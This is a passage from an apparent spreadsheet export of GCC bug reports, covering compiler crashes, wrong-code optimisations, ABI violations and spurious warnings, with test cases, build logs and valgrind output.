  if (argc != 2 || sscanf(argv[1] %x 
  if (((int)(u + 4)) &lt; (int)u)
    {
      exit(0)
    }
  exit(1)
}
bash-3.00$ /src/sicstus/install/gcc-4.1-20060804/x86-linux-glibc2.3/bin/gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /src/sicstus/install/src/gcc-4.1-20060804/configure --prefix=/src/sicstus/install/gcc-4.1-20060804/x86-linux-glibc2.3 --enable-languages=cc++
Thread model: posix
gcc version 4.1.2 20060804 (prerelease)
## Uses sscanf to obtain INT_MAX to keep gcc in the dark
## without optimization the comparison is true which is correct
bash-3.00$ /src/sicstus/install/gcc-4.1-20060804/x86-linux-glibc2.3/bin/gcc /home/perm/sicstus/sicstus4slon/bug.c &amp;&amp; ./a.out 0x7fffffff &amp;&amp; echo success || echo exited with $?
success
## with optimization the comparison is false which is correct
bash-3.00$ /src/sicstus/install/gcc-4.1-20060804/x86-linux-glibc2.3/bin/gcc -O1 /home/perm/sicstus/sicstus4slon/bug.c &amp;&amp; ./a.out 0x7fffffff &amp;&amp; echo success || echo exited with $?
exited with 1
bash-3.00$</t>
  </si>
  <si>
    <t>per.mildner</t>
  </si>
  <si>
    <t>GCC-46196</t>
  </si>
  <si>
    <t>[OOP] gfortran compiles invalid generic TBP: dummy arguments are type compatible</t>
  </si>
  <si>
    <t>module generic
  type :: a_type
   contains
     procedure :: a_subroutine
  end type a_type
  typeextends(a_type) :: b_type
   contains
     procedure :: b_subroutine
     generic :: g_sub =&gt; a_subroutineb_subroutine
  end type b_type
contains
  subroutine a_subroutine(this)
    class(a_type)::this
  end subroutine a_subroutine
  subroutine b_subroutine(this)
    class(b_type)::this
  end subroutine b_subroutine
end module generic
GNU Fortran (GCC) 4.6.0 20101022 (experimental)
This code is invalid because the dummy arguments in a_subroutine and b_subroutine are type compatible. Therefore they must not share a generic interface.</t>
  </si>
  <si>
    <t>GCC-11326</t>
  </si>
  <si>
    <t>C++ IA64 ABI: 3.1.4: sometimes pointer to temporary return value is implicit first parameter preceding this</t>
  </si>
  <si>
    <t>According to C++ Itanium ABI (http://www.codesourcery.com/cxx-
abi/abi.html#calls) clause 3.1.4 if the return value type has a non-trivial 
copy constructor or destructor the caller allocates space for a temporary and 
passes a pointer to the temporary as an implicit first parameter preceding both 
the â€œthisâ€ parameter and user parameters. The callee then constructs the return 
value into this temporary.
	I tried gcc 3.2 on United Linux 1.0 and found that this rule is 
violated â€œthisâ€ pointer is always r32 and the value returned in different ways 
but never the way described in this part of ABI.
	Here is a test case that demonstrates the problem:
test.cc:
#include 
#include 
struct ConstructedObject {
    ConstructedObject() {}
    ~ConstructedObject() {}
    ConstructedObject(const ConstructedObject 
}
struct FrameworkObject {
    ConstructedObject action()
}
ConstructedObject FrameworkObject::action() {
    void *r32 *r33
    asm(mov %0 = r32\nmov %1 = r33 : =r(r32) =r(r33) : )
    printf(In FrameworkObject this = %lx r32 = %lx r33 = %lx\n this r32 
r33)
    if (this != r33) {
        printf (Test failed\n)
        exit(-1)
    }
}
int main()
{
    FrameworkObject slawa
    slawa.action()
    return 0
}
command line: g++ -g -O0 test.cc &amp;&amp; a.out
Output:
In FrameworkObject this = 60000fffffffb270 r32 = 60000fffffffb270 r33 = 
6000000000000de0
Test failed
Test fails because according to ABI r32 is a placeholder for returned object 
r33 is â€œthisâ€ pointer.
Because gcc violates C++ Itanium ABI such way binaries built by gcc can be 
incompatible with binaries built by other compiler. To avoid such a situation 
C++ ABI standard was created. All compilers must honor it gcc must in greater 
degree as the most popular one that's why I set P1 priority.
The bug is reproducible both with gcc 3.2 and gcc 3.4.
/usr/bin/g++ -v
Reading specs from /usr/lib/gcc-lib/ia64-suse-linux/3.2/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-
prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --
libdir=/usr/lib --enable-languages=cc++f77objcjavaada --enable-libgcj --
with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --
enable-shared --enable-__cxa_atexit ia64-suse-linux
Thread model: posix
gcc version 3.2
/mnt/scratch/compiler/gcc-3.4-IA64/usr/local/bin/g++ -v
Reading specs from /mnt/scratch/compiler/gcc-3.4-IA64/usr/local/bin/../lib/gcc-
lib/ia64-unknown-linux-gnu/3.4/specs
Configured with: ./configure
Thread model: posix
gcc version 3.4 20030603 (experimental)</t>
  </si>
  <si>
    <t>Vyatcheslav.Sysoltsev</t>
  </si>
  <si>
    <t>GCC-6053</t>
  </si>
  <si>
    <t>double close in Socket code</t>
  </si>
  <si>
    <t>There is a double-close bug in the Socket code.
See this thread:
  http://gcc.gnu.org/ml/java-patches/2002-q1/msg00864.html
Release:
gcc 3.1</t>
  </si>
  <si>
    <t>GCC-3137</t>
  </si>
  <si>
    <t>v3 build fails due to compile error in complex_io.cc</t>
  </si>
  <si>
    <t>See .
Release:
gcc 3.0 prerelease
Environment:
hppa1.1-hp-hpux10.20
How-To-Repeat:
Build v3.</t>
  </si>
  <si>
    <t>GCC-1350</t>
  </si>
  <si>
    <t>Tree check: expected tree_list have pointer_type</t>
  </si>
  <si>
    <t>Compiling the program below gives:
$ gcj -C test.java 
test.java: In class `test':
test.java: In method `main(java.lang.String[])':
test.java:3: Tree check: expected tree_list have pointer_type
test.java:3: Internal compiler error in find_as_inner_class_do at ../gcc/java/parse.y:3516
Please submit a full bug report.
See  for instructions.
Well it should generate an error like
Attempt to reference field lengths in java.lang.String[].
Release:
unknown
Environment:
egcs 2.96 20000814
How-To-Repeat:
class test {
  public static void main(String[] args) {
    int a = args.lengths
  }
}</t>
  </si>
  <si>
    <t>GCC-61190</t>
  </si>
  <si>
    <t>[4.9 Regression] g++.old-deja/g++.mike/p4736b.C FAILs at -O2/-Os/-O3</t>
  </si>
  <si>
    <t>Created attachment 32798
prep
Valgrind output with various GCC versions:
$ g++-trunk-r210412 -O2 p4736b.ii
$ valgrind -q --track-origins=yes ./a.out
==11986== Use of uninitialised value of size 8
==11986==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==11986==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==11986==  Uninitialised value was created by a stack allocation
==11986==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==11986== 
==11986== Invalid read of size 8
==11986==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==11986==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==11986==  Address 0xffffffffffffffe8 is not stack'd malloc'd or (recently) free'd
==11986== 
==11986== 
==11986== Process terminating with default action of signal 11 (SIGSEGV)
==11986==  Access not within mapped region at address 0xFFFFFFFFFFFFFFE8
==11986==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==11986==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
$ g++-4_9-r210307 -O2 p4736b.ii
$ valgrind -q --track-origins=yes ./a.out
==12013== Use of uninitialised value of size 8
==12013==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12013==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==12013==  Uninitialised value was created by a stack allocation
==12013==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12013== 
==12013== Invalid read of size 8
==12013==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12013==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==12013==  Address 0xffffffffffffffe8 is not stack'd malloc'd or (recently) free'd
==12013== 
==12013== 
==12013== Process terminating with default action of signal 11 (SIGSEGV)
==12013==  Access not within mapped region at address 0xFFFFFFFFFFFFFFE8
==12013==    at 0x4006F3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12013==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
$ g++-4_8-r210303 -O2 p4736b.ii
$ valgrind -q --track-origins=yes ./a.out
==12047== Use of uninitialised value of size 8
==12047==    at 0x4006C3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12047==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==12047==  Uninitialised value was created by a stack allocation
==12047==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12047== 
==12047== Invalid read of size 8
==12047==    at 0x4006C3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12047==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
==12047==  Address 0xffffffffffffffe8 is not stack'd malloc'd or (recently) free'd
==12047== 
==12047== 
==12047== Process terminating with default action of signal 11 (SIGSEGV)
==12047==  Access not within mapped region at address 0xFFFFFFFFFFFFFFE8
==12047==    at 0x4006C3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12047==    by 0x400517: main (in /home/smatz/gcc-bug/1256/a.out)
$ g++-4_7-r210302 -O2 p4736b.ii
$ valgrind -q --track-origins=yes ./a.out
==12072== Use of uninitialised value of size 8
==12072==    at 0x4006C3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12072==    by 0x400511: main (in /home/smatz/gcc-bug/1256/a.out)
==12072==  Uninitialised value was created by a stack allocation
==12072==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12072== 
==12072== Use of uninitialised value of size 8
==12072==    at 0x4006C3: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12072==    by 0x40052B: main (in /home/smatz/gcc-bug/1256/a.out)
==12072==  Uninitialised value was created by a stack allocation
==12072==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12072== 
==12072== Use of uninitialised value of size 8
==12072==    at 0x4006D7: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12072==    by 0x40053F: main (in /home/smatz/gcc-bug/1256/a.out)
==12072==  Uninitialised value was created by a stack allocation
==12072==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12072== 
==12072== Use of uninitialised value of size 8
==12072==    at 0x4006E7: virtual thunk to Main::foo() (in /home/smatz/gcc-bug/1256/a.out)
==12072==    by 0x400553: main (in /home/smatz/gcc-bug/1256/a.out)
==12072==  Uninitialised value was created by a stack allocation
==12072==    at 0x400500: main (in /home/smatz/gcc-bug/1256/a.out)
==12072== 
$ g++-4_6-r197894 -O2 p4736b.ii
$ valgrind -q --track-origins=yes ./a.out
(no output)
The code seems valid and defined to me but somebody else might know otherwise.
I haven't analysed whether messages output by valgrind for gcc 4.7 are valid or just false positives.
Tested revisions:
trunk r210412 - SIGSEGV
4_9 r210307 - SIGSEGV
4_8 r210303 - SIGSEGV
4_7 r210302 - valgrind warnings but no crash
4_6 r197894 - OK</t>
  </si>
  <si>
    <t>GCC-2524</t>
  </si>
  <si>
    <t>missing default initialization of POD types in operator new</t>
  </si>
  <si>
    <t>gcc does not emit the initialization code for POD type objects
when they are created via the new operator like this:
double *a=new double()
This behavior violates 5.3.4 [New] par. 15 which states
&gt; if the new-initializer is of the form () default-initialization
&gt; shall be performed.
According to 8.5 [Initializers] par. 5 default-initialization
of a POD type object means its zero-initialization.
The program attached below checks three possible kinds of new:
scalar array and placement. All of them suffer from this
bug - the objects being created have non-zero (garbage) values.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
sparc-sun-solaris2.7
gcc compiled and installed from the release source distribution
without any changes
How-To-Repeat:
Compile and run the attached code. If the compiler is standard-compliant
it should print two lines of zeroes.</t>
  </si>
  <si>
    <t>GCC-2047</t>
  </si>
  <si>
    <t>Internal compiler error in `require_complete_type' at c-typeck.c:96</t>
  </si>
  <si>
    <t>$ gcc -c frame.c
frame.c:49: parse error before `fde'
frame.c:49: warning: no semicolon at end of struct or union
frame.c:50: warning: data definition has no type or storage class
frame.c:51: warning: data definition has no type or storage class
frame.c:55: parse error before `fde_vector'
frame.c:55: warning: no semicolon at end of struct or union
frame.c:56: warning: data definition has no type or storage class
frame.c:57: warning: data definition has no type or storage class
frame.c:60: parse error before `*'
frame.c: In function `start_fde_sort':
frame.c:62: `accu' undeclared (first use in this function)
frame.c:62: (Each undeclared identifier is reported only once
frame.c:62: for each function it appears in.)
frame.c:62: `fde' undeclared (first use in this function)
frame.c:62: parse error before `)'
frame.c:64: parse error before `)'
frame.c:68: `NULL' undeclared (first use in this function)
frame.c: At top level:
frame.c:72: parse error before `*'
frame.c: In function `fde_insert':
frame.c:74: `accu' undeclared (first use in this function)
frame.c:75: `this_fde' undeclared (first use in this function)
frame.c: At top level:
frame.c:90: parse error before `*'
frame.c: In function `fde_split':
frame.c:92: syntax error before `*'
frame.c:93: `size_t' undeclared (first use in this function)
frame.c:94: `fde' undeclared (first use in this function)
frame.c:94: `chain_end' undeclared (first use in this function)
frame.c:94: `marker' undeclared (first use in this function)
frame.c:94: Tree check: expected class 't' have 'x' (error_mark)
frame.c:94: Internal compiler error in `require_complete_type' at c-typeck.c:96Please submit a full bug report.
See  for instructions.
Release:
2.96-ia64-000717 snap 001117
Environment:
$ gcc -v -save-temps frame.c
Reading specs from /usr/lib/gcc-lib/ia64-redhat-linux/2.96-ia64-000717/specs
gcc version 2.96-ia64-000717 snap 001117
 /usr/lib/gcc-lib/ia64-redhat-linux/2.96-ia64-000717/cpp -lang-c -v -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ia64 -D__ia64__ -D__linux -D__linux__ -D_LONGLONG -Dlinux -Dunix -D__LP64__ -D__ELF__ -D__ia64 -D__ia64__ -D__linux -D__linux__ -D_LONGLONG -D__linux__ -D__unix__ -D__LP64__ -D__ELF__ -D__linux -D__unix -Asystem(linux) -Acpu(ia64) -Amachine(ia64) -D__LONG_MAX__=9223372036854775807L frame.c frame.i
GNU CPP version 2.96-ia64-000717 snap 001117 (cpplib)
 (IA-64)
ignoring duplicate directory /usr/include
#include ... search starts here:
#include  search starts here:
 /usr/include
 /usr/lib/gcc-lib/ia64-redhat-linux/2.96-ia64-000717/include
 /usr/ia64-redhat-linux/include
End of search list.
 /usr/lib/gcc-lib/ia64-redhat-linux/2.96-ia64-000717/cc1 frame.i -ma-step -mb-step -quiet -dumpbase frame.c -version -o frame.s
GNU C version 2.96-ia64-000717 snap 001117 (ia64-redhat-linux) compiled by GNU C version 2.96-ia64-000717 snap 001117.
How-To-Repeat:
compile a copy of src/gcc/frame.c in a directory having only
defaults.h    frame.c  frame.s	      gthr.h
frame-ia64.c  frame.h  gthr-posix.h   ia64.h
frame-ia64.o  frame.i  gthr-single.h  tconfig.h</t>
  </si>
  <si>
    <t>jreiser</t>
  </si>
  <si>
    <t>GCC-1134</t>
  </si>
  <si>
    <t>Incompatible inherited throws clause are not catched by gcj</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: Bug appears to be fixed in recent cvs compilers. Joerg has 
    verified this.
</t>
  </si>
  <si>
    <t>joerg.brunsmann</t>
  </si>
  <si>
    <t>GCC-56150</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE segfault in do_pre / tail_merge_optimize</t>
  </si>
  <si>
    <t>The program below makes 
  gcc version 4.8.0 20130130 (experimental) (GCC)
crash (ICE) at optimisation level -O2 and -O3:
$ gcc -O2 5-min.c
5-min.c: In function â€˜func_1â€™:
5-min.c:9:6: internal compiler error: Segmentation fault
 void func_1 () {
      ^
0x8e59af crash_signal
	../../gcc-svn-src/gcc/toplev.c:332
0xa434a7 vn_valueize
	../../gcc-svn-src/gcc/tree-ssa-sccvn.h:226
0xa434a7 gimple_equal_p
	../../gcc-svn-src/gcc/tree-ssa-tail-merge.c:1124
0xa434a7 find_duplicate
	../../gcc-svn-src/gcc/tree-ssa-tail-merge.c:1214
0xa434a7 find_clusters_1
	../../gcc-svn-src/gcc/tree-ssa-tail-merge.c:1409
0xa434a7 find_clusters
	../../gcc-svn-src/gcc/tree-ssa-tail-merge.c:1430
0xa455ec tail_merge_optimize(unsigned int)
	../../gcc-svn-src/gcc/tree-ssa-tail-merge.c:1634
0xa0b69c do_pre
	../../gcc-svn-src/gcc/tree-ssa-pre.c:4754
Here is the program 5-min.c:
struct {
  int f4
} g1
long g2
volatile long g3
void func_1 () {
    if (g2)
        g1 = g1
    else
        g3
}
void main () {
}</t>
  </si>
  <si>
    <t>francesco.zappa.nardelli</t>
  </si>
  <si>
    <t>GCC-6388</t>
  </si>
  <si>
    <t>Integer.MIN_VALUE == 0x80000000 optimized to false on powerpc</t>
  </si>
  <si>
    <t>The following program (compiled to byte or native code):
public class IT
{
    public static void main(String[] args)
    {
        System.out.println(Integer.MIN_VALUE)
        System.out.println(0x80000000)
        System.out.println(Integer.MIN_VALUE == 0x80000000)
        System.out.println(0x80000000 == 0x80000000) 
    }
}
Should produce the following output (as it does on i686):
-2147483648
-2147483648
true
true
But on powerpc it produces:
-2147483648
-2147483648
false
true
Release:
gcj 3.1</t>
  </si>
  <si>
    <t>GCC-40121</t>
  </si>
  <si>
    <t>[4.5 Regression]  Revision 147418 failed gcc.target/i386/ssefp-[12].c</t>
  </si>
  <si>
    <t>Revision 147418:
http://gcc.gnu.org/ml/gcc-cvs/2009-05/msg00393.html
caused:
FAIL: gcc.target/i386/ssefp-1.c scan-assembler maxsd
FAIL: gcc.target/i386/ssefp-2.c scan-assembler minsd
on Linux/ia32 and Linux/x86-64.</t>
  </si>
  <si>
    <t>GCC-57098</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2154 (unrecognizable insn) with -mcmodel=large -msse4 and __builtin_shuffle()</t>
  </si>
  <si>
    <t>Created attachment 29957
reduced testcase
Compiler output:
$ gcc -mcmodel=large -msse4 testcase.c
testcase.c: In function 'foo':
testcase.c:6:1: error: unrecognizable insn:
 }
 ^
(insn 19 18 20 2 (set (reg:V16QI 71)
        (unspec:V16QI [
                (reg:V16QI 71)
                (mem/u/c:V16QI (symbol_ref/u:DI (*.LC1) [flags 0x2]) [0 S16 A128])
            ] UNSPEC_PSHUFB)) testcase.c:5 -1
     (nil))
testcase.c:6:1: internal compiler error: in extract_insn at recog.c:2154
0x9b919a _fatal_insn(char const* rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:109
0x9b922a _fatal_insn_not_found(rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:117
0x974fa1 extract_insn(rtx_def*)
        /mnt/svn/gcc-trunk/gcc/recog.c:2154
0x811c67 instantiate_virtual_regs_in_insn
        /mnt/svn/gcc-trunk/gcc/function.c:1561
0x811c67 instantiate_virtual_regs
        /mnt/svn/gcc-trunk/gcc/function.c:1926
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-198362-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-198362-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130427 (experimental) (GCC) 
Tested revisions:
r198362 - crash
4.8 r198018 - crash
4.7 r198018 - crash
4.6 r198018 - doesn't recognise __builtin_shuffle()</t>
  </si>
  <si>
    <t>GCC-53765</t>
  </si>
  <si>
    <t>Internal errror in build_call_a at cp/call.c:342</t>
  </si>
  <si>
    <t>Created attachment 27697
Input file that triggers the internal error.
Using command line g++ gcc-bug.cpp -std=c++0x with the given attachment g++ fails with an internal error :
gcc-bug.cpp: In function â€˜T operation(T T) [with T = int bool m = false]â€™:
gcc-bug.cpp:22:35:   instantiated from here
gcc-bug.cpp:17:17: erreur interne du compilateur: dans build_call_a Ã  cp/call.c:342
See attached file for a minimal test case which displays the bug.
Regards
Ã‰tienne</t>
  </si>
  <si>
    <t>svart.riddare</t>
  </si>
  <si>
    <t>GCC-30301</t>
  </si>
  <si>
    <t>Invalid static member of anonymous class or union diagnosed too late</t>
  </si>
  <si>
    <t>The following invalid code snippet is accepted since at least GCC 2.95.3:
==================================
template struct A
{
  struct { static int i }
}
==================================
It is correctly rejected when the template is instantiated.</t>
  </si>
  <si>
    <t>GCC-15625</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] friend defined inside a template fails to find static function</t>
  </si>
  <si>
    <t>enum Relation {equalOp}
template
class A {
public:
    static
    bool    Relop(const A
    friend
    bool    operator==(const A&amp; a1 const A&amp; a2) {
        return Relop(a1 a2 equalOp)
        }
    B* b
    }
int main() {
    A a a == a
    return 0
    }
produces:
foo.cc: In function `bool operator==(const A&amp; const A&amp;)':
foo.cc:16:   instantiated from here
foo.cc:10: error: no matching function for call to `A::Relop(const A&amp; const A&amp; Relation)'
foo.cc:6: note: candidates are: static bool A::Relop(const A&amp; const A&amp; Relation)
Even if this code is actually invalid (who could tell except the committee?) the error message should at least indicate what is really wrong.
Ivan</t>
  </si>
  <si>
    <t>GCC-5103</t>
  </si>
  <si>
    <t>jni.h sets java-exceptions</t>
  </si>
  <si>
    <t>Right now our jni.h includes javaprims.h
which has this line:
#pragma GCC java_exceptions
This is bad if the user is trying to compile
ordinary (non-CNI) C++ code.
The fix here is to write jni.h in a way that doesn't
assume you're using gcj.  
If we assume gcc we can still use the __mode__ extension
for typedefs.  Or if we assume inttypes.h we can use another
method.  Failing that we'd have to introduce a platform-specific header.
We'll also need a gcj-compatible mode so that the
typedefs are omitted.  That will let us continue to include our jni.h
in jni.cc.
Release:
current cvs</t>
  </si>
  <si>
    <t>GCC-5611</t>
  </si>
  <si>
    <t>(Unsigned) long long I/O unsupported on FreeBSD 3.4</t>
  </si>
  <si>
    <t>_GLIBCPP_USE_LONG_LONG is left undefined because the system C library does not support strtoll and strtoull and therefore I/O for (unsigned) long long values is unsupported by libstdc++.
GCC 2.95.x has I/O support for (unsigned) long long.
Release:
gcc-3.0.3
Environment:
FreeBSD 3.4
How-To-Repeat:
configure on a system without strtoll/strtoull available</t>
  </si>
  <si>
    <t>GCC-77292</t>
  </si>
  <si>
    <t>Spurious warning: logical not is only applied to the left hand side of comparison</t>
  </si>
  <si>
    <t>The warning introduced in bug 62183 is trigger-happy.
int
foo (int a int b)
{
  // Make it obvious that these are booleans.
  a = !!a
  b = !!b
  return !a == b
}
# gcc --version
gcc (Ubuntu 5.4.0-6ubuntu1~16.04.2) 5.4.0 20160609
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# gcc -c -Wall -O2 bbb.c 
bbb.c: In function â€˜fooâ€™:
bbb.c:8:13: warning: logical not is only applied to the left hand side of comparison [-Wlogical-not-parentheses]
   return !a == b
             ^
This is silly and out-right illogical when a and b are booleans.
!a == b means the same as !(a == b) so the warning is pointing out
that I might have meant something else that upon inspection is seen
to be the same thing.
Note: by boolean I mean an integer with value 0 or 1.</t>
  </si>
  <si>
    <t>GCC-60381</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in vt_expand_var_loc_chain at var-tracking.c:8245</t>
  </si>
  <si>
    <t>Created attachment 32241
Preprocessed source
/home/dave/gnu/gcc/objdir/./gcc/xgcc -B/home/dave/gnu/gcc/objdir/./gcc/ -B/home/
dave/opt/gnu/gcc/gcc-4.9/hppa-linux-gnu/bin/ -B/home/dave/opt/gnu/gcc/gcc-4.9/hppa-linux-gnu/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.9/hppa-linux-gnu/include -isystem /home/dave/opt/gnu/gcc/gcc-4.9/hppa-linux-gnu/sys-include    -g -O2 -O
2  -g -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-
prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fPIC -DELF=1 -DLINUX=1 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fPIC -DELF=1 -DLINUX=1 -I. -I. -I../.././gcc -I../../../gcc/libgcc -I../../../gcc
/libgcc/. -I../../../gcc/libgcc/../gcc -I../../../gcc/libgcc/../include  -DHAVE_
CC_TLS  -o _divdc3.o -MT _divdc3.o -MD -MP -MF _divdc3.dep -DL_divdc3 -c ../../.
./gcc/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
../../../gcc/libgcc/libgcc2.c: In function â€˜__muldc3â€™:
../../../gcc/libgcc/libgcc2.c:2001:1: internal compiler error: in vt_expand_var_
loc_chain at var-tracking.c:8245
 }
0xd07623 vt_expand_var_loc_chain
        ../../gcc/gcc/var-tracking.c:8245
0xd0823b vt_expand_loc_callback
        ../../gcc/gcc/var-tracking.c:8441
0x3caa57 cselib_expand_value_rtx_1
        ../../gcc/gcc/cselib.c:1692
0x3cacdb cselib_expand_value_rtx_1
        ../../gcc/gcc/cselib.c:1730
0x3ca46f cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/gcc/cselib.c:1539
0xd0775f vt_expand_var_loc_chain
        ../../gcc/gcc/var-tracking.c:8279
0xd0823b vt_expand_loc_callback
        ../../gcc/gcc/var-tracking.c:8441
0x3caa57 cselib_expand_value_rtx_1
        ../../gcc/gcc/cselib.c:1692
0x3cacdb cselib_expand_value_rtx_1
        ../../gcc/gcc/cselib.c:1730
0x3ca46f cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/gcc/cselib.c:1539
0xd0775f vt_expand_var_loc_chain
        ../../gcc/gcc/var-tracking.c:8279
0xd0823b vt_expand_loc_callback
        ../../gcc/gcc/var-tracking.c:8441
0x3caa57 cselib_expand_value_rtx_1
        ../../gcc/gcc/cselib.c:1692
0x3ca46f cselib_expand_value_rtx_cb(rtx_def* bitmap_head* int rtx_def* (*)(rtx_def* bitmap_head* int void*) void*)
        ../../gcc/gcc/cselib.c:1539
0xd0775f vt_expand_var_loc_chain
        ../../gcc/gcc/var-tracking.c:8279
0xd0880b vt_expand_1pvar
        ../../gcc/gcc/var-tracking.c:8554
0xd08b0f emit_note_insn_var_location(variable_def** emit_note_data_def*)
        ../../gcc/gcc/var-tracking.c:8608
0xd116df void hash_table::traverse_noresize(emit_note_data_def*)
        ../../gcc/gcc/hash-table.h:928
0xd105e7 void hash_table::traverse(emit_note_data_def*)
        ../../gcc/gcc/hash-table.h:950
0xd0a46f emit_notes_for_changes
        ../../gcc/gcc/var-tracking.c:8970
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[3]: *** [_muldc3.o] Error 1
Introduced in revision 208220.</t>
  </si>
  <si>
    <t>GCC-68346</t>
  </si>
  <si>
    <t>[6 Regression] Bootstrap failure on i686-linux</t>
  </si>
  <si>
    <t>Most likely since the c++ delayed folding merge but I admit I've bootstrapped trunk on i686-linux 8 days ago so the window is larger trunk no longer bootstraps on i686-linux:
../../gcc/gimple-fold.c: In function â€˜bool gimple_fold_builtin_printf(gimple_stmt_iterator* tree tree built_in_function)â€™:
../../gcc/gimple-fold.c:2621:30: error: self-comparison always evaluates to true [-Werror=tautological-compare]
        &amp;&amp; (size_t) (int) len == len
                              ^~
This code is not new in there but supposedly before that we either have not been folding the arguments for -Wtautological-compare or not so aggressively.
I'd say it is quite common idiom to cast a variable to some other type and compare to itself with the intent that if the type is the same it is a no-op check but if the type is narrower or has different signedness it filters out some undesirable values.</t>
  </si>
  <si>
    <t>GCC-29820</t>
  </si>
  <si>
    <t>ICE in fold_convert at fold-const.c:2146</t>
  </si>
  <si>
    <t>Hi
the attached code exhibits an ICE:
gfcbug44.f90: In function 'point':
gfcbug44.f90:28: internal compiler error: in fold_convert at fold-const.c:2146
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-9649</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE in finish_member_declaration at cp/semantics.c:1850 when redeclaring a static member variable</t>
  </si>
  <si>
    <t>If you declare a static data member twice gcc will hang while compiling.  Looks like stuck in a loop to me - top shows gcc sucking 99.9% of cpu.
aaa.h
----------
template  class Aaa
{
public: // methods
    Aaa() {}
    virtual ~Aaa() {}
    static int _test
    static int _test
}                               
template  int Aaa::_test
-----------
aab.h
-----------
#include aaa.h
class Aab : public Aaa
{
public: // methods
    Aab()
    virtual ~Aab()
}
------------
aab.cpp
------------
#include aab.h
Aab::Aab(){} 
Aab::~Aab(){}
Release:
3.2 3.3 3.4 (originally reported for 2.96)
Environment:
Red Hat Linux 7.3 2.96-110
How-To-Repeat:
Compile the code included in the description:
gcc aab.cpp</t>
  </si>
  <si>
    <t>gendzwil</t>
  </si>
  <si>
    <t>GCC-24824</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] ICE: in build_abbrev_table at dwarf2out.c:6427 with -feliminate-dwarf2-dups</t>
  </si>
  <si>
    <t>g++ ICE with error message:
test.cc:24: internal compiler error: in build_abbrev_table at dwarf2out.c:6427
Please submit a full bug report
g++ call: g++ -c -gdwarf-2 -feliminate-dwarf2-dups test.cc -o test.o
testcase:
---8X----------------------------------
namespace N {
  struct I {}
  template
  struct _V_base {
    I _impl
  }
  template
  struct V : _V_base {
    using _V_base::_impl
  }
} // namespace N
struct S {}
struct T {
  T()
  N::V _l
}
T::T() {}
---X8----------------------------------
ICE with:
